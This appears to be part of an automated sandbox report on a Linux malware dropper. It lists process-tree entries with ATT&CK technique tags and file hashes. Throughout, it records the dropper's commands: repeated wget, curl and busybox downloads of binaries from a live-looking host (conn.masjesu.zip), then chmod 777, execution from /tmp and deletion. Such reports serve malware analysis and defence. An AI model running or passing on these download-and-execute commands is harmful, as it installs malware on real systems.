/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97